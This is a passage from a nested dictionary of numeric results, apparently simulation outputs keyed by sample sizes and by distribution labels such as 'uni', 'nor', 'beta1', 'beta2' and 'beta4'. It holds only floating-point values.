0.049336171986172905, 'nor': 0.10301434196794912, 'beta1': 0.04759746865566261, 'beta2': 0.09139711532965078, 'beta4': 0.03862301968563475}, 400: {'uni': 0.05463463924511991, 'nor': 0.10682402764821919, 'beta1': 0.05340709570203017, 'beta2': 0.0936397826733697, 'beta4': 0.04355260412773232}, 300: {'uni': 0.0623466502897439, 'nor': 0.11107955757096866, 'beta1': 0.06138170680347399, 'beta2': 0.10123250462805955, 'beta4': 0.05033595962483417}, 200: {'uni': 0.07554749668228766, 'nor': 0.12086678162054343, 'beta1': 0.0750416632363875, 'beta2': 0.11066959713661007, 'beta4': 0.0628060062760799}, 150: {'uni': 0.08739996958985385, 'nor': 0.12869541233213377, 'beta1': 0.08678659184299659, 'beta2': 0.12101764597314102, 'beta4': 0.07333451117705557}, 100: {'uni': 0.1059059556833244, 'nor': 0.1439095892813752, 'beta1': 0.10502496284200347, 'beta2': 0.1363796007125728, 'beta4': 0.09183606784698817}, 75: {'uni': 0.12175423531083684, 'nor': 0.15563413203809512, 'beta1': 0.12147657892364672, 'beta2': 0.1499620639515612, 'beta4': 0.10751782011418409}, 50: {'uni': 0.14800126374665257, 'nor': 0.17897180334401325, 'beta1': 0.14816290217139777, 'beta2': 0.1722281185648024, 'beta4': 0.1346224305003566}, 30: {'uni': 0.1887615721783148, 'nor': 0.21543468889014744, 'beta1': 0.190646670636544, 'beta2': 0.20948680711825576, 'beta4': 0.176259226549204}, 20: {'uni': 0.23023189652909293, 'nor': 0.2526685251360331, 'beta1': 0.23189889525873808, 'beta2': 0.2466910520448944, 'beta4': 0.2191893725919991}, 10: {'uni': 0.32299804783142616, 'nor': 0.3385208191642214, 'beta1': 0.3240970373299222, 'beta2': 0.330246772124018, 'beta4': 0.3131856367832769}}, 30: {1000: {'uni': 0.04055798585870418, 'nor': 0.12045878407806199, 'beta1': 0.03391282668139051, 'beta2': 0.09043202391168703, 'beta4': 0.026772664648918143}, 750: {'uni': 0.04458498964957813, 'nor': 0.12145350900121721, 'beta1': 0.03914910293909302, 'beta2': 0.0935565637316701, 'beta4': 0.031080040721369384}, 500: {'uni': 0.05222341973082678, 'nor': 0.1268382821804781, 'beta1': 0.04777032892633393, 'beta2': 0.09990217329576723, 'beta4': 0.03819481473884745}, 400: {'uni': 0.056861508270290684, 'nor': 0.12942238770629788, 'beta1': 0.0532675354399576, 'beta2': 0.10316552318518735, 'beta4': 0.042868749065423484}, 300: {'uni': 0.06457084720883632, 'nor': 0.13351603952339597, 'beta1': 0.061361887130497395, 'beta2': 0.10951015522976426, 'beta4': 0.049682092131381306}, 200: {'uni': 0.07720678728039648, 'nor': 0.14219389731717424, 'beta1': 0.07503079131267198, 'beta2': 0.12017019496462067, 'beta4': 0.061734503814410535}, 150: {'uni': 0.08848642196594714, 'nor': 0.1500355311895341, 'beta1': 0.08631984938429821, 'beta2': 0.12838525098850095, 'beta4': 0.0718410012841619}, 100: {'uni': 0.10657957938014417, 'nor': 0.16231407544099366, 'beta1': 0.10548271930091585, 'beta2': 0.14360421901255419, 'beta4': 0.08890819357084263}, 75: {'uni': 0.12258252780364842, 'nor': 0.1746077488797695, 'beta1': 0.12168422916715942, 'beta2': 0.15632646573417341, 'beta4': 0.10426763026201397}, 50: {'uni': 0.14824751171813622, 'nor': 0.19345539799865896, 'beta1': 0.14757982972276956, 'beta2': 0.1782320565559261, 'beta4': 0.12956990555575637}, 30: {'uni': 0.19007534797164194, 'nor': 0.22980066650049646, 'beta1': 0.18953145977057473, 'beta2': 0.21398344377916256, 'beta4': 0.17247209313506517}, 20: {'uni': 0.23051753895022453, 'nor': 0.2663268342701276, 'beta1': 0.2307327055958382, 'beta2': 0.2513386326841577, 'beta4': 0.21383795792710225}, 10: {'uni': 0.32014689511568667, 'nor': 0.34697266220274, 'beta1': 0.3237670049413221, 'beta2': 0.3357362830315301, 'beta4': 0.30748660519832094}}, 20: {1000: {'uni': 0.049274913203381954, 'nor': 0.14598076136064764, 'beta1': 0.04773172248544687, 'beta2': 0.10208044800903471, 'beta4': 0.02678894215396943}, 750: {'uni': 0.051859490365182094, 'nor': 0.14739225959074442, 'beta1': 0.047875305623994, 'beta2': 0.10544771824923445, 'beta4': 0.031169107205504698}, 500: {'uni': 0.058024976856876465, 'nor': 0.15193051514519595, 'beta1': 0.04839368483595815, 'beta2': 0.10979535020355546, 'beta4': 0.038016224370682805}, 400: {'uni': 0.062200844002211486, 'nor': 0.1537517807864368, 'beta1': 0.05344573741806791, 'beta2': 0.11432086453404405, 'beta4': 0.042678379119217236}, 300: {'uni': 0.06864694129034321, 'nor': 0.1588340869015541, 'beta1': 0.061657151171832125, 'beta2': 0.11908535230283115, 'beta4': 0.049311269074143405}, 200: {'uni': 0.08082515275880864, 'nor': 0.1653404286408089, 'beta1': 0.07528213929157085, 'beta2': 0.12905037545647996, 'beta4': 0.06078472833045673}, 150: {'uni': 0.09067340943954105, 'nor': 0.1719167421754575, 'beta1': 0.08654348956789837, 'beta2': 0.1377516058425463, 'beta4': 0.07049778930105871}, 100: {'uni': 0.1086666058987017, 'nor': 0.18582138140525045, 'beta1': 0.10555332688519786, 'beta2': 0.1520573786986546, 'beta4': 0.08771942043391467}, 75: {'uni': 0.12367516250114241, 'nor': 0.1936529244743188, 'beta1': 0.12127286264345238, 'beta2': 0.16320255408908907, 'beta4': 0.10226685365525778}, 50: {'uni': 0.14913935597178152, 'nor': 0.2158588407634494, 'beta1': 0.14842740385680675, 'beta2': 0.18610463716939651, 'beta4': 0.1264269525886395}, 30: {'uni': 0.1894435241919467, 'nor': 0.24698362415268657, 'beta1': 0.1902052475438244, 'beta2': 0.2208874403100017, 'beta4': 0.16740207123414985}, 20: {'uni': 0.23045459417674147, 'nor': 0.2799231266745311, 'beta1': 0.23095718339914606, 'beta2': 0.25625627348359864, 'beta4': 0.20847547734226834}, 10: {'uni': 0.3184035049947215, 'nor': 0.36156368323481775, 'beta1': 0.31812314781434214, 'beta2': 0.3366009664560641, 'beta4': 0.30273632497052144}}, 10: {1000: {'uni': 0.08279938794024366, 'nor': 0.20746864987159275, 'beta1': 0.08963877760273378, 'beta2': 0.13088236164799233, 'beta4': 0.02673844765905936}, 750: {'uni': 0.08426832961599184, 'nor': 0.20874280374404391, 'beta1': 0.08955811722492701, 'beta2': 0.13542495464202575, 'beta4': 0.03080220729065536}, 500: {'uni': 0.08659140770361992, 'nor': 0.21132286282870372, 'beta1': 0.08971002227585745, 'beta2': 0.137474594046657, 'beta4': 0.03774600933075223}, 400: {'uni': 0.08845482467918225, 'nor': 0.21371189689386383, 'beta1': 0.0897073855362439, 'beta2': 0.14244766972162892, 'beta4': 0.0421496940463395}, 300: {'uni': 0.09163999186977767, 'nor': 0.21681989561836174, 'beta1': 0.089886875954427, 'beta2': 0.14494850873515852, 'beta4': 0.048801996044743334}, 200: {'uni': 0.09824982646268379, 'nor': 0.2229381862621922, 'beta1': 0.09064463588385452, 'beta2': 0.15207622316955471, 'beta4': 0.05991506202414604}, 150: {'uni': 0.10597878355719062, 'nor': 0.22906946762966052, 'beta1': 0.0914691379185335, 'beta2': 0.15947859758245603, 'beta4': 0.06920496232883624}, 100: {'uni': 0.1204073194961825, 'nor': 0.23747551585427307, 'beta1': 0.10577014356758019, 'beta2': 0.17148307936029666, 'beta4': 0.08496381763696761}, 75: {'uni': 0.1334590836264363, 'nor': 0.2501046310309356, 'beta1': 0.12291423498596181, 'beta2': 0.1820777815006388, 'beta4': 0.09937452733840269}, 50: {'uni': 0.15659478623743123, 'nor': 0.2649487192543656, 'beta1': 0.14785603195288383, 'beta2': 0.20366919537172168, 'beta4': 0.12201244106590736}, 30: {'uni': 0.19399803736356186, 'nor': 0.29471369014840654, 'beta1': 0.18900850606731456, 'beta2': 0.23377561600860308, 'beta4': 0.15979617861494677}, 20: {'uni': 0.2327209769876345, 'nor': 0.3216648320505805, 'beta1': 0.22968888409928068, 'beta2': 0.2662874109164176, 'beta4': 0.19955725481302533}, 10: {'uni': 0.3167985271399704, 'nor': 0.3980931466618715, 'beta1': 0.3167971014813921, 'beta2': 0.34276356880144665, 'beta4': 0.28980968413230446}}}, 0.25: {1000: {1000: {'uni': 0.03199275137995117, 'nor': 0.0377612558253515, 'beta1': 0.03207386640216253, 'beta2': 0.051317660480200256, 'beta4': 0.029150123111011506}, 750: {'uni': 0.036938790221011875, 'nor': 0.042241745609793546, 'beta1': 0.03708565565300198, 'beta2': 0.05311937295175995, 'beta4': 0.034313693230411}, 500: {'uni': 0.04518467957852923, 'nor': 0.04973246769105877, 'beta1': 0.045095608233479745, 'beta2': 0.0579300692476834, 'beta4': 0.04254589117113883}, 400: {'uni': 0.0502034071958003, 'nor': 0.05454115588980907, 'beta1': 0.05055080954159219, 'beta2': 0.061161550088231986, 'beta4': 0.04797066239068751}, 300: {'uni': 0.058494397771818585, 'nor': 0.062028740711859265, 'beta1': 0.05833380007137132, 'beta2': 0.06798358010263028, 'beta4': 0.05630460494121223}, 200: {'uni': 0.07096438668841598, 'nor': 0.07412020377216044, 'beta1': 0.07133115327499512, 'beta2': 0.07896884752622757, 'beta4': 0.06907818308168096}, 150: {'uni': 0.08208505648349079, 'nor': 0.08447429233523951, 'beta1': 0.08184669107075387, 'beta2': 0.08801509549599151, 'beta4': 0.07992744012646691}, 100: {'uni': 0.10004565549548194, 'nor': 0.10237522390461173, 'beta1': 0.0999275224639195, 'beta2': 0.10532128217368142, 'beta4': 0.0988563106856703}, 75: {'uni': 0.11589185212999692, 'nor': 0.11807251171646749, 'beta1': 0.11485210164860138, 'beta2': 0.12031055325904372, 'beta4': 0.11412331652115923}, 50: {'uni': 0.14049191983680576, 'nor': 0.14195558645235828, 'beta1': 0.14048079336364855, 'beta2': 0.14452775406933738, 'beta4': 0.13989919886563593}, 30: {'uni': 0.18085720286815, 'nor': 0.18147395490124796, 'beta1': 0.1801423435578804, 'beta2': 0.1829095154193338, 'beta4': 0.17865742454053038}, 20: {'uni': 0.2188793664518785, 'nor': 0.2205153587206411, 'beta1': 0.2189194895346508, 'beta2': 0.2208849473005658, 'beta4': 0.21926359723489885}, 10: {'uni': 0.30590762068535415, 'nor': 0.3074011033419454, 'beta1': 0.3065343123341402, 'beta2': 0.3079808039413954, 'beta4': 0.3041198788346453}}, 750: {1000: {'uni': 0.032368347030127004, 'nor': 0.039495932165949266, 'beta1': 0.032127527217265195, 'beta2': 0.05096820210071745, 'beta4': 0.028616305560898614}, 750: {'uni': 0.03713885168013714, 'nor': 0.043817159608602774, 'beta1': 0.0367837672562607, 'beta2': 0.05312860283337206, 'beta4': 0.033712076422947546}, 500: {'uni': 0.04514502478230087, 'nor': 0.050939113474436026, 'beta1': 0.04537187336954829, 'beta2': 0.05849377906681347, 'beta4': 0.04188494892464878}, 400: {'uni': 0.050330802291682186, 'nor': 0.055505230954840445, 'beta1': 0.050734669077095895, 'beta2': 0.06247764901879249, 'beta4': 0.04742928078021369}, 300: {'uni': 0.05864673808177773, 'nor': 0.06291114299630962, 'beta1': 0.05852603179278021, 'beta2': 0.06804203235154582, 'beta4': 0.05550944554210635}, 200: {'uni': 0.07110774959507277, 'nor': 0.0750417803744845, 'beta1': 0.07108558678723764, 'beta2': 0.07979409652007075, 'beta4': 0.06858026018509678}, 150: {'uni': 0.08247125828473023, 'nor': 0.08547463541022982, 'beta1': 0.08215710788274455, 'beta2': 0.08848680474820936, 'beta4': 0.0796438596153346}, 100: {'uni': 0.10109208297439909, 'nor': 0.10352781679515655, 'beta1': 0.1006336182710834, 'beta2': 0.10634244051752054, 'beta4': 0.09786482796671303}, 75: {'uni': 0.11522357484837831, 'nor': 0.11827499297282096, 'beta1': 0.1159196515430023, 'beta2': 0.12014424072164931, 'beta4': 0.11380644122735906}, 50: {'uni': 0.14060642168956575, 'nor': 0.1432810536145968, 'beta1': 0.1404685185904413, 'beta2': 0.14445981166680172, 'beta4': 0.14025485753096134}, 30: {'uni': 0.18144382340878018, 'nor': 0.18220171362137827, 'beta1': 0.18019204096546904, 'beta2': 0.18336020074753134, 'beta4': 0.17996933419550307}, 20: {'uni': 0.2198405269160041, 'nor': 0.21972983923644784, 'beta1': 0.2207144033629308, 'beta2': 0.22254113568844458, 'beta4': 0.21995845947855397}, 10: {'uni': 0.30707583033219277, 'nor': 0.30677572835070843, 'beta1': 0.307186086020681, 'beta2': 0.3087181699800424, 'beta4': 0.30403958473809867}}, 500: {1000: {'uni': 0.031998610331581856, 'nor': 0.04277431287550973, 'beta1': 0.03202380702522861, 'beta2': 0.053247212628520835, 'beta4': 0.028106826865999635}, 750: {'uni': 0.0368150729172666, 'nor': 0.046175305332631256, 'beta1': 0.036955925234784415, 'beta2': 0.055430828654678854, 'beta4': 0.033006186200381704}, 500: {'uni': 0.045327422254650696, 'nor': 0.053320028563376476, 'beta1': 0.04521124170257684, 'beta2': 0.06079825113216919, 'beta4': 0.04125585885231965}, 400: {'uni': 0.05058625293211194, 'nor': 0.05811521301238065, 'beta1': 0.05047854919479744, 'beta2': 0.0644472021193534, 'beta4': 0.04657197609011046}, 300: {'uni': 0.05837680448123017, 'nor': 0.06554961214753685, 'beta1': 0.05832160254575547, 'beta2': 0.07045708483321578, 'beta4': 0.05450035709303813}, 200: {'uni': 0.07137488269124403, 'nor': 0.0765816734100554, 'beta1': 0.07097260906025193, 'beta2': 0.08122687128901757, 'beta4': 0.06810904430297748}, 150: {'uni': 0.08171768121444029, 'nor': 0.08706245424314168, 'beta1': 0.08224852816102035, 'beta2': 0.09206848284106278, 'beta4': 0.07864927350348105}, 100: {'uni': 0.10001354205421553, 'nor': 0.10494588642600383, 'beta1': 0.10032083676885117, 'beta2': 0.1073252427285255, 'beta4': 0.09755420704181944}, 75: {'uni': 0.11496296171371789, 'nor': 0.11892336415280835, 'beta1': 0.11573445907704838, 'beta2': 0.1221024266233946, 'beta4': 0.11312234604041477}, 50: {'uni': 0.1406991966723249, 'nor': 0.14434822688745969, 'beta1': 0.1408991819394264, 'beta2': 0.14576451960892592, 'beta4': 0.1390064572124975}, 30: {'uni': 0.18087047323939087, 'nor': 0.1829040634798727, 'beta1': 0.18054920049463752, 'beta2': 0.18399230494708463, 'beta4': 0.17823513722522538}, 20: {'uni': 0.21939938602159992, 'nor': 0.22182287755317703, 'beta1': 0.22045130781379252, 'beta2': 0.22290813512523416, 'beta4': 0.21814484703021253}, 10: {'uni': 0.3060836645742364, 'nor': 0.3091515297248897, 'beta1': 0.3066663173709814, 'beta2': 0.3075083864383387, 'beta4': 0.30422501574238897}}, 400: {1000: {'uni': 0.032005088669465276, 'nor': 0.04456557950368989, 'beta1': 0.03207047760229875, 'beta2': 0.05335428637134554, 'beta4': 0.02764205849240342}, 750: {'uni': 0.03707438658946127, 'nor': 0.048852635452191456, 'beta1': 0.037059120244776866, 'beta2': 0.05545369912568332, 'beta4': 0.03250465520660134}, 500: {'uni': 0.04527161577889338, 'nor': 0.05510988745673151, 'beta1': 0.0454293101810781, 'beta2': 0.061105496120222313, 'beta4': 0.04074431956109695}, 400: {'uni': 0.05033443638682883, 'nor': 0.059551554506442894, 'beta1': 0.050241105416355736, 'beta2': 0.06506528423110045, 'beta4': 0.045759081418304426}, 300: {'uni': 0.058211459729823334, 'nor': 0.06646450082163013, 'beta1': 0.05824726492475796, 'beta2': 0.07136706424691125, 'beta4': 0.05371853302556494}, 200: {'uni': 0.07136004884006591, 'nor': 0.07847889640933037, 'beta1': 0.07119158271516751, 'beta2': 0.0828087241613199, 'beta4': 0.066989888959891}, 150: {'uni': 0.08226981215061391, 'nor': 0.08787491015723636, 'beta1': 0.0820213556261612, 'beta2': 0.0922395433103187, 'beta4': 0.0782455680987506}, 100: {'uni': 0.0999425967371041, 'nor': 0.1055486790460004, 'beta1': 0.09960125420912624, 'beta2': 0.1088178339306568, 'beta4': 0.09699734407107313}, 75: {'uni': 0.11616131437111837, 'nor': 0.11979183643647795, 'beta1': 0.11556364812719394, 'beta2': 0.12237760407249698, 'beta4': 0.1124749001044939}, 50: {'uni': 0.14107921330185552, 'nor': 0.14436563346328762, 'beta1': 0.14060580635640263, 'beta2': 0.14613157564214374, 'beta4': 0.13891710396762352}, 30: {'uni': 0.18030508328138095, 'nor': 0.18482261222058646, 'beta1': 0.18024669252888958, 'beta2': 0.18503042752212556, 'beta4': 0.17833798147699706}, 20: {'uni': 0.21972895156921568, 'nor': 0.22310165064904985, 'beta1': 0.21906869562507247, 'beta2': 0.2237444999736099, 'beta4': 0.21783462233689643}, 10: {'uni': 0.3045782011808965, 'nor': 0.30585595084735995, 'beta1': 0.3062967507461382, 'beta2': 0.30905483197965655, 'beta4': 0.3053249816659628}}, 300: {1000: {'uni': 0.032239084457734934, 'nor': 0.04761428127094802, 'beta1': 0.032038173010609405, 'beta2': 0.05574065007123413, 'beta4': 0.027269701240414}, 750: {'uni': 0.037163331746985356, 'nor': 0.05159782362000957, 'beta1': 0.03687151259245286, 'beta2': 0.057493247342013665, 'beta4': 0.032126332878003705}, 500: {'uni': 0.04518027895134363, 'nor': 0.05830373631162644, 'beta1': 0.045342369983153, 'beta2': 0.06302093871729986, 'beta4': 0.03992543574842056}, 400: {'uni': 0.05041660540845222, 'nor': 0.06273062597571621, 'beta1': 0.050506925792484725, 'beta2': 0.06679374494442292, 'beta4': 0.0453809683918249}, 300: {'uni': 0.05819791840262872, 'nor': 0.06889853173644056, 'beta1': 0.05881589576054247, 'beta2': 0.07548404171599854, 'beta4': 0.05330460648413682}, 200: {'uni': 0.07099409803866191, 'nor': 0.08015771733382343, 'beta1': 0.07149914372253519, 'beta2': 0.08491818197910528, 'beta4': 0.0660207111886566}, 150: {'uni': 0.08165348909753622, 'nor': 0.09041841839558967, 'beta1': 0.08186412904658036, 'beta2': 0.09446598626929148, 'beta4': 0.07704328735244007}, 100: {'uni': 0.10032050128616843, 'nor': 0.10736683019992799, 'beta1': 0.10052095271344208, 'beta2': 0.11016773078480463, 'beta4': 0.09642704867227114}, 75: {'uni': 0.11561316546647915, 'nor': 0.12094802011662908, 'beta1': 0.11523834024523168, 'beta2': 0.12439262057779943, 'beta4': 0.11152777353064466}, 50: {'uni': 0.14018486722638512, 'nor': 0.14571982545039386, 'beta1': 0.14112158063583297, 'beta2': 0.1477125646402092, 'beta4': 0.13703508806923154}, 30: {'uni': 0.18072304976823583, 'nor': 0.1846706102625543, 'beta1': 0.18032073445217073, 'beta2': 0.18543660392632166, 'beta4': 0.1774188167718942}, 20: {'uni': 0.22002473058377936, 'nor': 0.22233988983477326, 'beta1': 0.219611410295673, 'beta2': 0.2238362766248162, 'beta4': 0.21760444529561554}, 10: {'uni': 0.30592439821930945, 'nor': 0.3083597959740417, 'beta1': 0.3068948351628876, 'beta2': 0.3076071685456584, 'beta4': 0.3053936839900976}}, 200: {1000: {'uni': 0.032145127804773244, 'nor': 0.05349333747510293, 'beta1': 0.0319567056231127, 'beta2': 0.05863229193574737, 'beta4': 0.02689596641142078}, 750: {'uni': 0.03706566197402705, 'nor': 0.05686923973969488, 'beta1': 0.03685443931928145, 'beta2': 0.061233105783269015, 'beta4': 0.03135246921457169}, 500: {'uni': 0.045287310383440804, 'nor': 0.06333268823272437, 'beta1': 0.04543966891783402, 'beta2': 0.06633448987394563, 'beta4': 0.039157769206374704}, 400: {'uni': 0.05058001358487568, 'nor': 0.06756534858480051, 'beta1': 0.05056634568175178, 'beta2': 0.07314321695984138, 'beta4': 0.04408417011680896}, 300: {'uni': 0.0584055924161348, 'nor': 0.07369190108393786, 'beta1': 0.05857816948096051, 'beta2': 0.07848195518441148, 'beta4': 0.05169771628815578}, 200: {'uni': 0.07130150466307517, 'nor': 0.08467495205397024, 'beta1': 0.07127183814358251, 'beta2': 0.0881972753860466, 'beta4': 0.06459411653988484}, 150: {'uni': 0.08230542143096298, 'nor': 0.09388689821838958, 'beta1': 0.0823575524673264, 'beta2': 0.09843414713564969, 'beta4': 0.07600083070681307}, 100: {'uni': 0.09992259917931273, 'nor': 0.11061606520328848, 'beta1': 0.10091421972922207, 'beta2': 0.11274797159715078, 'beta4': 0.09405990854917767}, 75: {'uni': 0.1146453681089189, 'nor': 0.1243577334515438, 'beta1': 0.11572896766854551, 'beta2': 0.126786382446473, 'beta4': 0.10989836905325345}, 50: {'uni': 0.1408283945272606, 'nor': 0.14854443655662386, 'beta1': 0.14077373626256007, 'beta2': 0.15015510894940037, 'beta4': 0.1362970789621657}, 30: {'uni': 0.18065144082287762, 'nor': 0.18602556667128156, 'beta1': 0.18024583757633306, 'beta2': 0.187119560361907, 'beta4': 0.1768157942624079}, 20: {'uni': 0.21915855466007622, 'nor': 0.2250505751776598, 'beta1': 0.21842255121376986, 'beta2': 0.2247693098465804, 'beta4': 0.21625303838766974}, 10: {'uni': 0.3069805298827638, 'nor': 0.3088397242466276, 'beta1': 0.3053746544466997, 'beta2': 0.3098571203920325, 'beta4': 0.30339983933013226}}, 150: {1000: {'uni': 0.03222316489755345, 'nor': 0.05945194607376453, 'beta1': 0.03207935408945817, 'beta2': 0.06079634191773392, 'beta4': 0.026527269808695464}, 750: {'uni': 0.0370321650244374, 'nor': 0.0617883925674626, 'beta1': 0.03711700730448053, 'beta2': 0.06372190827907176, 'beta4': 0.03096740102793627}, 500: {'uni': 0.04532144365663909, 'nor': 0.0680586194258842, 'beta1': 0.04536848896627477, 'beta2': 0.07251693015188532, 'beta4': 0.03866327712014228}, 400: {'uni': 0.0505977822228203, 'nor': 0.07203749527198017, 'beta1': 0.050685474943401365, 'beta2': 0.07485785669758882, 'beta4': 0.04352869184910363}, 300: {'uni': 0.057965032685755036, 'nor': 0.07790764637502356, 'beta1': 0.058658948406533795, 'beta2': 0.08098586671063707, 'beta4': 0.050983529052287424}, 200: {'uni': 0.0710371027428352, 'nor': 0.08820871252384349, 'beta1': 0.07148282244840176, 'beta2': 0.0914952470037026, 'beta4': 0.06346089963043011}, 150: {'uni': 0.08207640995751564, 'nor': 0.09766509211855923, 'beta1': 0.08167656775849508, 'beta2': 0.10012999401461498, 'beta4': 0.07427821448227956}, 100: {'uni': 0.09994734914200143, 'nor': 0.1129459883944704, 'beta1': 0.09980539436202157, 'beta2': 0.11592632608795883, 'beta4': 0.09304062628193266}, 75: {'uni': 0.11553236151223506, 'nor': 0.1273360867115455, 'beta1': 0.11561304775458114, 'beta2': 0.12896122578621239, 'beta4': 0.10856651888369684}, 50: {'uni': 0.1401267895773386, 'nor': 0.150874223818793, 'beta1': 0.14106509605862422, 'beta2': 0.15309480271707476, 'beta4': 0.13434799522511576}, 30: {'uni': 0.18100210887716317, 'nor': 0.18846250113659102, 'beta1': 0.18108600475737724, 'beta2': 0.18820408383757903, 'beta4': 0.1744893497548229}, 20: {'uni': 0.22007531711429196, 'nor': 0.22624986333580377, 'beta1': 0.22105754134774402, 'beta2': 0.2254264398404922, 'beta4': 0.21671616234795646}, 10: {'uni': 0.30579411743746077, 'nor': 0.31037044747734677, 'beta1': 0.30727843528835264, 'beta2': 0.3098797929188794, 'beta4': 0.30316988477280543}}, 100: {1000: {'uni': 0.03274216345456671, 'nor': 0.06775327941395048, 'beta1': 0.032061342840036255, 'beta2': 0.06382316122578824, 'beta4': 0.026316312803939867}, 750: {'uni': 0.037579409945831976, 'nor': 0.07067264993908817, 'beta1': 0.036944834310432384, 'beta2': 0.06667491200402953, 'beta4': 0.03049780432266838}, 500: {'uni': 0.045626044711458535, 'nor': 0.07640799770080187, 'beta1': 0.045208821668136, 'beta2': 0.07491373191518652, 'beta4': 0.03785430223359623}, 400: {'uni': 0.05090625729095505, 'nor': 0.07934795957920815, 'beta1': 0.05066551543139719, 'beta2': 0.07868508780911171, 'beta4': 0.04264742804290289}, 300: {'uni': 0.05839819477500041, 'nor': 0.08457660157789437, 'beta1': 0.05827469063418195, 'beta2': 0.0836305486592761, 'beta4': 0.05014012449638705}, 200: {'uni': 0.07131120343453617, 'nor': 0.09564864803002038, 'beta1': 0.07121453603448036, 'beta2': 0.09501904926088, 'beta4': 0.06199710926061397}, 150: {'uni': 0.0824632894282834, 'nor': 0.10351775253135054, 'beta1': 0.08222593298518815, 'beta2': 0.10403737737010954, 'beta4': 0.07317445595779534}, 100: {'uni': 0.10027559659721097, 'nor': 0.11911693503739967, 'beta1': 0.10035631836386402, 'beta2': 0.11905850690926911, 'beta4': 0.09115925777533135}, 75: {'uni': 0.11533926378096324, 'nor': 0.13293086862293707, 'beta1': 0.11550021587841142, 'beta2': 0.13242283015048073, 'beta4': 0.10583595257901535}, 50: {'uni': 0.14125461490836977, 'nor': 0.15481343079067678, 'beta1': 0.14083804530729904, 'beta2': 0.15486187856446598, 'beta4': 0.13213869045119073}, 30: {'uni': 0.18067693462898593, 'nor': 0.19209904272032094, 'beta1': 0.18048591905655675, 'beta2': 0.19132292898534176, 'beta4': 0.1731204060059379}, 20: {'uni': 0.2194497761344132, 'nor': 0.22952776186358645, 'beta1': 0.2210084936336856, 'beta2': 0.2277523801643781, 'beta4': 0.21401777417550116}, 10: {'uni': 0.30491836630916047, 'nor': 0.3136863210929642, 'beta1': 0.3059618384293903, 'beta2': 0.31145305621358244, 'beta4': 0.30218740315401166}}, 75: {1000: {'uni': 0.03296804299574074, 'nor': 0.07502584510325999, 'beta1': 0.03198909471182765, 'beta2': 0.06627849631603855, 'beta4': 0.026018303221585604}, 750: {'uni': 0.03781889522611104, 'nor': 0.07750171416392093, 'beta1': 0.03709295438746274, 'beta2': 0.06966374591084012, 'beta4': 0.030083456649105722}, 500: {'uni': 0.04588611395620795, 'nor': 0.0832308871539903, 'beta1': 0.04503188517914297, 'beta2': 0.0778680999061172, 'beta4': 0.037422494765473796}, 400: {'uni': 0.05103896713119821, 'nor': 0.08624943932637474, 'beta1': 0.050515142768203625, 'beta2': 0.08092558102345371, 'beta4': 0.04214991872531762}, 300: {'uni': 0.058619489540432834, 'nor': 0.09218377722158483, 'beta1': 0.05833566460055162, 'beta2': 0.08767072534918796, 'beta4': 0.04948056049731009}, 200: {'uni': 0.07142937649921666, 'nor': 0.10153881530955883, 'beta1': 0.0711962247024438, 'beta2': 0.09878624986895768, 'beta4': 0.06114388931769735}, 150: {'uni': 0.0818160837503934, 'nor': 0.10962021535420124, 'beta1': 0.0821248472699912, 'beta2': 0.10678592690352856, 'beta4': 0.07201635109029625}, 100: {'uni': 0.10033935923350429, 'nor': 0.12400158701587738, 'beta1': 0.10019144115697398, 'beta2': 0.12257338875860513, 'beta4': 0.08958751642761531}, 75: {'uni': 0.11463620909947292, 'nor': 0.13729280250456427, 'beta1': 0.11545358481112064, 'beta2': 0.13533805566311075, 'beta4': 0.10463860294573568}, 50: {'uni': 0.14041083829724632, 'nor': 0.1601934699301324, 'beta1': 0.14118094481810134, 'beta2': 0.15649100485487455, 'beta4': 0.13079204536225447}, 30: {'uni': 0.17941841118483848, 'nor': 0.19432333539672053, 'beta1': 0.18108637707222786, 'beta2': 0.1940514148883128, 'beta4': 0.17116345309006809}, 20: {'uni': 0.2191045954547003, 'nor': 0.23156916864980065, 'beta1': 0.21958539239874875, 'beta2': 0.2288693020710007, 'beta4': 0.2111983732891391}, 10: {'uni': 0.3076647019304655, 'nor': 0.3173691048923303, 'beta1': 0.30576781526816577, 'beta2': 0.3130098845736485, 'beta4': 0.2972158297961716}}, 50: {1000: {'uni': 0.03433430022899808, 'nor': 0.08842102532667545, 'beta1': 0.03223331907376098, 'beta2': 0.07277518065743305, 'beta4': 0.02588821628662097}, 750: {'uni': 0.03887126446259914, 'nor': 0.0910846873593219, 'beta1': 0.036951578170920873, 'beta2': 0.07622969912474264, 'beta4': 0.03006036248745808}, 500: {'uni': 0.04689196532878104, 'nor': 0.09593657648017129, 'beta1': 0.04503241099014954, 'beta2': 0.08323295043032963, 'beta4': 0.03714881820594479}, 400: {'uni': 0.051774246404964364, 'nor': 0.09916078860193034, 'beta1': 0.0505571321231062, 'beta2': 0.08730017553432268, 'beta4': 0.04159182778940329}, 300: {'uni': 0.059150975430708325, 'nor': 0.10379530845713192, 'beta1': 0.05822224483584626, 'beta2': 0.09363761776791535, 'beta4': 0.04832173433265907}, 200: {'uni': 0.0716859637391355, 'nor': 0.11234734351192865, 'beta1': 0.07094419045693312, 'beta2': 0.10324004723700275, 'beta4': 0.059980305787279864}, 150: {'uni': 0.08266517102902693, 'nor': 0.12043265249847296, 'beta1': 0.08183417503139817, 'beta2': 0.11217584960878624, 'beta4': 0.07046469195355531}, 100: {'uni': 0.10054768121870128, 'nor': 0.13395983977474127, 'beta1': 0.09972911370096887, 'beta2': 0.12640535172959536, 'beta4': 0.08769745435863463}, 75: {'uni': 0.11506440143566307, 'nor': 0.1461475325877074, 'beta1': 0.11504294118932046, 'beta2': 0.1391005160652219, 'beta4': 0.10257774239474937}, 50: {'uni': 0.1405096759295903, 'nor': 0.16839269038201765, 'beta1': 0.13993583438148083, 'beta2': 0.16161227714177773, 'beta4': 0.12805930575607483}, 30: {'uni': 0.18017995907272144, 'nor': 0.20200364133487392, 'beta1': 0.18055279602385688, 'beta2': 0.19608371098558458, 'beta4': 0.1683674379324781}, 20: {'uni': 0.21805138604748409, 'nor': 0.23779035600849233, 'beta1': 0.21986203616531452, 'beta2': 0.23327926081944855, 'beta4': 0.2082804112449691}, 10: {'uni': 0.3040705295399263, 'nor': 0.32031549693696865, 'beta1': 0.3066804021631311, 'beta2': 0.31327311772302824, 'beta4': 0.2972068392863597}}, 30: {1000: {'uni': 0.03871017016879641, 'nor': 0.11049883217909062, 'beta1': 0.032247812148711405, 'beta2': 0.0805454176845462, 'beta4': 0.02559841016582587}, 750: {'uni': 0.042769108003219106, 'nor': 0.11296398305504446, 'beta1': 0.03699026418458462, 'beta2': 0.08466666160065073, 'beta4': 0.02979787689834079}, 500: {'uni': 0.04978362867791797, 'nor': 